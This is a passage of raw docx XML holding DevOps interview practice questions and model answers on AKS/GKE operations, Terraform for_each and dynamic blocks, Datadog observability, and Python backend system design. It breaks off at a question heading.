      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is AKS, and how is it different from GKE from an operations point of view?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/AKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: AKS is Azure Kubernetes Service, the managed Kubernetes offering on Azure. Operationally, both AKS and GKE manage the control plane and integrate with their cloud networking, identity, storage, monitoring, and load-balancing ecosystems. The differences are mainly in platform integration: AKS uses Azure Resource Manager, Azure CNI, managed identities, Azure Monitor, and Azure Load Balancer/Application Gateway patterns, while GKE integrates with Google IAM, VPC-native networking, Cloud Operations, Cloud Load Balancing, and Workload Identity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Scenario: An AKS or GKE node upgrade is blocked or causing disruption. What would you investigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/AKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check PodDisruptionBudgets, max unavailable settings, node surge settings, unavailable replicas, DaemonSets, local storage usage, long terminationGracePeriodSeconds, pods without safe eviction, cluster autoscaler limits, quota, and node pool health. For disruption, check whether readiness probes, rollout strategy, replica count, topology spread, and PDBs allow enough capacity during upgrade. The safe design is separate node pools, surge upgrades, tested maintenance windows, and workload disruption budgets aligned with real availability needs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What is a dynamic block in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A dynamic block in Terraform generates repeatable nested blocks inside a resource, data source, provider, or provisioner from a collection. It is useful when the nested block count or contents are driven by input variables, for example generating multiple ingress rules, egress rules, disks, or lifecycle rules without copying the same nested block many times.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What is the use case of a dynamic block?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a dynamic block when a resource has repeatable nested configuration and the number of blocks should be controlled by input data. For example, a security group may need a variable list of ingress rules, or an S3 bucket may need a variable list of lifecycle rules. It keeps modules reusable while avoiding duplicated HCL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How would you create multiple S3 buckets in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define the desired bucket names as a set or map and use for_each on aws_s3_bucket. For example, variable bucket_names can be a set(string), then resource aws_s3_bucket buckets { for_each = var.bucket_names bucket = each.value }. If each bucket needs different settings, use a map of objects and read fields from each.value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. What is the meaning of each.value in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: each.value is the value of the current item when a resource, module, or dynamic block uses for_each. If for_each is a set of strings, each.value is the current string. If for_each is a map, each.key is the map key and each.value is the map value, which may be an object containing multiple attributes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Why do we use each.value?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: We use each.value to parameterize each repeated resource or nested block with the data for the current item in a for_each loop. It lets one resource block create many correctly configured resources without hardcoding names, ports, tags, lifecycle rules, or other per-item settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. Why do we use toset() in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/IaC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: toset() converts a list or tuple into a set, which is often needed because for_each accepts a map or set of strings. It also removes duplicates and makes the collection identity based on values rather than list indexes, which is safer than count for resources where you do not want index shifts to recreate infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 52 - Datadog Observability Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you install and configure the Datadog Agent on a Kubernetes or GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Install the Datadog Agent as a DaemonSet, usually with the Datadog Helm chart or Operator, so every node runs an Agent pod. Store the API key in a Kubernetes Secret, set the cluster name and tags, enable kube-state-metrics/CoreDNS/node/container collection, and turn on logs, APM, process, or network monitoring only when needed. In GKE, also configure the GCP integration for cloud-level metrics and use tolerations so the Agent runs on important node pools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How does Datadog collect metrics, logs, and traces from Kubernetes workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Datadog collects node and container metrics through the Agent, cluster object state through kube-state-metrics or the Cluster Agent, logs from container stdout/stderr or files, and traces through APM libraries sending spans to the Agent. Kubernetes labels, annotations, pod metadata, service names, environment, and version tags are attached so metrics, logs, and traces can be filtered and correlated by service, namespace, cluster, and deployment version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you enable Datadog APM for a microservice running on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/APM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Add the Datadog tracing library for the application language, set service, env, and version tags, and point the app to the Datadog Agent trace endpoint. In Kubernetes, expose the Agent APM port, inject environment variables through the Deployment, and verify traces appear with correct service names, resources, errors, latency, and dependencies. For production, configure sampling, sensitive-data scrubbing, and trace-log correlation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you correlate Datadog logs with traces for faster debugging?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Enable trace-log correlation in the Datadog tracing library so trace_id and span_id are injected into structured application logs. Ship logs with the Datadog Agent, parse them as JSON where possible, and standardize tags like service, env, version, cluster, namespace, and pod. Then an engineer can jump from a slow trace to the exact related log lines, or from an error log to the full request trace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What Datadog monitors would you create for a production API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create monitors for user-impacting golden signals first: availability, 5xx error rate, p95/p99 latency, request rate anomalies, saturation, and dependency failures. Add Kubernetes monitors for CrashLoopBackOff, pending pods, restart spikes, CPU/memory pressure, HPA maxed out, node readiness, and ingress/load-balancer errors. Alerts should have owners, severity, routing, runbooks, dashboard links, and thresholds tied to SLOs rather than every noisy metric.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you define SLOs and error-budget alerts in Datadog?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/SRE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define SLIs from request success rate, latency, or availability using Datadog APM, metrics, or logs. Set SLO targets such as 99.9% successful requests over 30 days, then create burn-rate alerts for fast burns and slow burns so teams catch both major outages and gradual degradation. Tie alerts to service ownership, on-call routing, release policy, and error-budget decisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What dashboards would you build in Datadog for application teams, SREs, and leadership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Dashboards</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For application teams, build service dashboards with RED metrics, dependency latency, error traces, recent deployments, and logs. For SREs, build platform dashboards covering clusters, nodes, workloads, ingress, SLO burn, incidents, and capacity. For leadership, show availability, customer-impacting incidents, SLO compliance, MTTR, change failure rate, and cost/reliability trends without overwhelming low-level details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. A Datadog alert shows p95 latency increased after a deployment. How would you investigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start from the alert timeframe and compare latency by service, endpoint, env, version, region, and deployment marker. Use APM traces to identify the slow span, check errors and logs correlated to those traces, then inspect dependencies such as database, cache, downstream APIs, and Kubernetes resource saturation. If the new version is the clear trigger and user impact is high, pause rollout or roll back while continuing root-cause analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you control Datadog cost for logs, custom metrics, and high-cardinality tags?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Cost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Control cost by reducing noisy log ingestion, using exclusion filters, sampling debug logs, setting retention by value, and indexing only logs needed for search/alerting. Avoid high-cardinality tags such as request IDs, user IDs, pod UIDs, or unbounded URLs on custom metrics. Review custom metric volume, container counts, APM ingestion, and dashboard/monitor usage regularly with ownership and cleanup policies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. When would you use Datadog Synthetic Monitoring and Real User Monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Synthetics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Synthetic Monitoring to test critical user journeys or APIs from controlled locations on a schedule, even when real traffic is low. Use Real User Monitoring to understand actual browser/mobile user experience, frontend errors, page load time, geographic latency, and the impact of releases on real customers. Together they help distinguish external availability from real user experience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you integrate Datadog with GCP, Slack, PagerDuty, and CI/CD pipelines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Integrations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the GCP integration to collect Cloud Monitoring metrics, audit logs, and service-level telemetry, then tag resources consistently by project, environment, team, and service. Route Datadog monitors to Slack for visibility and PagerDuty for actionable incidents. In CI/CD, send deployment events and version tags to Datadog so dashboards and APM can correlate regressions with releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What security and access controls would you apply in Datadog for a large engineering organization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Datadog/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use SSO/SAML, SCIM provisioning, MFA, role-based access control, teams, restricted API/application keys, and least-privilege permissions for dashboards, monitors, logs, and security products. Protect sensitive logs with scrubbing and pipelines, limit who can create high-cost ingestion patterns, audit changes to monitors and integrations, and separate production access from lower environments where needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 53 - Python Developer System Design Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you design a scalable Python backend API for a high-traffic web application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with clear requirements: read/write volume, latency SLO, data consistency, authentication, and failure tolerance. Use FastAPI or Django behind a load balancer, stateless app replicas, a relational database for core data, Redis for caching/rate limiting, a queue for slow background work, and object storage for large files. Add autoscaling, structured logs, metrics, traces, health checks, CI/CD, database migrations, and rollback support so the service can scale and be operated safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How would you design REST API endpoints, request validation, pagination, filtering, and versioning in a Python service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/API Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Design resource-oriented endpoints with clear nouns, HTTP methods, status codes, and consistent error responses. Use Pydantic, DRF serializers, or equivalent schemas for request and response validation. Add pagination with cursor or limit/offset depending on scale, whitelist filter/sort fields, and version breaking changes through /v1 and /v2 or version headers. Document the API with OpenAPI and add contract tests for important consumers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you design the database layer for a Python application, including schema design, indexes, migrations, transactions, and connection pooling?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Database Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model tables around access patterns and data integrity, with primary keys, foreign keys, unique constraints, and indexes for common queries. Use SQLAlchemy, Django ORM, or another ORM carefully, but inspect generated SQL for hot paths. Manage schema changes with Alembic or Django migrations, wrap multi-step writes in transactions, size connection pools to avoid exhausting the database, and add read replicas or partitioning only when real load requires it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you add Redis caching to a Python backend, and how would you handle cache invalidation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Caching</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cache expensive reads or frequently requested data with deterministic keys, TTLs, and serialization that is safe to evolve. Use cache-aside for most API data: read from Redis, fall back to DB on miss, then populate the cache. Invalidate or update affected keys on writes, use short TTLs for data that can tolerate staleness, add jitter to avoid stampedes, and monitor hit rate, evictions, latency, and memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. When would you use Celery, RQ, Cloud Tasks, Pub/Sub, or Kafka for background processing in a Python application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Async Processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a background system when work is slow, retryable, scheduled, or should not block the request path. Celery is good for Python-heavy distributed task queues with retries and scheduling; RQ is simpler for Redis-backed jobs; Cloud Tasks is strong for durable HTTP task dispatch; Pub/Sub is good for event-driven fanout; Kafka is better for high-throughput event streams and replay. Choose based on durability, ordering, throughput, retry behavior, and operational burden.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you choose between asyncio, threads, multiprocessing, and worker queues in Python system design?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Concurrency</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use asyncio for high-concurrency I/O when libraries are truly async, threads for blocking I/O libraries that release the GIL or for simple parallel I/O, multiprocessing for CPU-bound work that needs multiple cores, and worker queues for durable work outside the request lifecycle. For web APIs, keep request handlers lightweight and push long-running jobs to workers so latency and availability are predictable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you design retries, timeouts, idempotency, and circuit breakers for a Python service calling external APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Reliability</w:t>
      </w:r>
    </w:p>
